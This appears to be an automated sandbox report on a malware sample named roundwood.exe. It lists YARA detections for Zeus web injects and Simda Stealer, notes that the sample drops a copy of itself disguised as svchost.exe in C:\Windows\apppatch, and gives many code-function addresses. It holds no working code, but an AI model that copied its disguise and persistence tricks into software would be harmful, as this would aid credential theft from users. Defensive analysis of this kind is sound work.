Source: 00000002.00000003.2498994285.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.3060188818.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2474596414.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: roundwood.exe PID: 5852, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 5284, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4268, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4672, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6980, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6300, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6648, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5168, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5616, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2672, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3436, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4764, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3656, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4460, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2212, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2180, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4444, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown

Yara detected Simda Stealer

Source: Yara match	File source: 0.2.roundwood.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.roundwood.exe.6ba318.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.88e000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.88e000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.roundwood.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: roundwood.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5284, type: MEMORYSTR

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_004021B0: CreateFileA,DeviceIoControl,CloseHandle,

0_2_004021B0

Source: C:\Users\user\Desktop\roundwood.exe	File created: C:\Windows\apppatch\svchost.exe			Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_004090E0	0_2_004090E0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0043A1C0	0_2_0043A1C0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0040EA40	0_2_0040EA40
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00441240	0_2_00441240
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00447A4D	0_2_00447A4D
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00435230	0_2_00435230
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00444300	0_2_00444300
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00442B10	0_2_00442B10
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00446330	0_2_00446330
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_004403F0	0_2_004403F0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0043BC40	0_2_0043BC40
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0040EC60	0_2_0040EC60
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00423460	0_2_00423460
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00445C60	0_2_00445C60
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044A410	0_2_0044A410
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00414540	0_2_00414540
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00445590	0_2_00445590
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0043C5A0	0_2_0043C5A0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0042E6E0	0_2_0042E6E0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00441EB0	0_2_00441EB0
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00443770	0_2_00443770
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0044DFC3	0_2_0044DFC3
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0043C780	0_2_0043C780
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_0043A7A0	0_2_0043A7A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004090E0	2_2_004090E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043A1C0	2_2_0043A1C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040EA40	2_2_0040EA40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00441240	2_2_00441240
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00447A4D	2_2_00447A4D
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00435230	2_2_00435230
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00444300	2_2_00444300
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00442B10	2_2_00442B10
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00446330	2_2_00446330
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004403F0	2_2_004403F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043BC40	2_2_0043BC40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040EC60	2_2_0040EC60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00423460	2_2_00423460
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00445C60	2_2_00445C60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044A410	2_2_0044A410
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00414540	2_2_00414540
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00445590	2_2_00445590
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043C5A0	2_2_0043C5A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0042E6E0	2_2_0042E6E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00441EB0	2_2_00441EB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00443770	2_2_00443770
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044DFC3	2_2_0044DFC3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043C780	2_2_0043C780
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043A7A0	2_2_0043A7A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D412F0	2_2_02D412F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D282E0	2_2_02D282E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3BAB0	2_2_02D3BAB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D36380	2_2_02D36380
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D343A0	2_2_02D343A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3D370	2_2_02D3D370
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D35840	2_2_02D35840
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D08860	2_2_02D08860
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D1D060	2_2_02D1D060
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3F860	2_2_02D3F860
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D44010	2_2_02D44010
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D481C3	2_2_02D481C3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3F190	2_2_02D3F190
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D361A0	2_2_02D361A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0E140	2_2_02D0E140
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D08640	2_2_02D08640
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3AE40	2_2_02D3AE40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2EE30	2_2_02D2EE30
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D39FF0	2_2_02D39FF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3C710	2_2_02D3C710
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3DF00	2_2_02D3DF00
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D3FF30	2_2_02D3FF30
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D02CE0	2_2_02D02CE0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D33DC0	2_2_02D33DC0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F0230	2_2_028F0230
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028C9A40	2_2_028C9A40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FC240	2_2_028FC240
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02902A4D	2_2_02902A4D
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FB3F0	2_2_028FB3F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FF300	2_2_028FF300
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FDB10	2_2_028FDB10
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028C40E0	2_2_028C40E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F51C0	2_2_028F51C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029019F0	2_2_029019F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FCEB0	2_2_028FCEB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FFEC0	2_2_028FFEC0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028E96E0	2_2_028E96E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F7780	2_2_028F7780
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F57A0	2_2_028F57A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02908FC3	2_2_02908FC3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028FE770	2_2_028FE770
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02905410	2_2_02905410
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F6C40	2_2_028F6C40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028C9C60	2_2_028C9C60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028DE460	2_2_028DE460
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02900C60	2_2_02900C60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02900590	2_2_02900590
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028F75A0	2_2_028F75A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028CF540	2_2_028CF540
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012EE140	4_2_012EE140
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013161A0	4_2_013161A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131F190	4_2_0131F190
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013281C3	4_2_013281C3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01324010	4_2_01324010
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E8860	4_2_012E8860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012FD060	4_2_012FD060
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131F860	4_2_0131F860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01315840	4_2_01315840
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131D370	4_2_0131D370
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013143A0	4_2_013143A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01316380	4_2_01316380
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131BAB0	4_2_0131BAB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013212F0	4_2_013212F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013082E0	4_2_013082E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01313DC0	4_2_01313DC0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E2CE0	4_2_012E2CE0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131FF30	4_2_0131FF30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131C710	4_2_0131C710
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131DF00	4_2_0131DF00
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01319FF0	4_2_01319FF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130EE30	4_2_0130EE30
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E8640	4_2_012E8640
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0131AE40	4_2_0131AE40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012751C0	4_2_012751C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012440E0	4_2_012440E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01281330	4_2_01281330
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127F300	4_2_0127F300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127DB10	4_2_0127DB10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127B3F0	4_2_0127B3F0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01270230	4_2_01270230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01249A40	4_2_01249A40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01282A4D	4_2_01282A4D
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127C240	4_2_0127C240
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0124F540	4_2_0124F540
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012775A0	4_2_012775A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01280590	4_2_01280590
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01285410	4_2_01285410
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01249C60	4_2_01249C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0125E460	4_2_0125E460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01280C60	4_2_01280C60
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01276C40	4_2_01276C40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127E770	4_2_0127E770
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012757A0	4_2_012757A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01277780	4_2_01277780
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01288FC3	4_2_01288FC3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0127CEB0	4_2_0127CEB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012696E0	4_2_012696E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E38860	5_2_00E38860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E4D060	5_2_00E4D060
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E6F860	5_2_00E6F860
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E65840	5_2_00E65840
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E74010	5_2_00E74010
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E781C3	5_2_00E781C3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E661A0	5_2_00E661A0
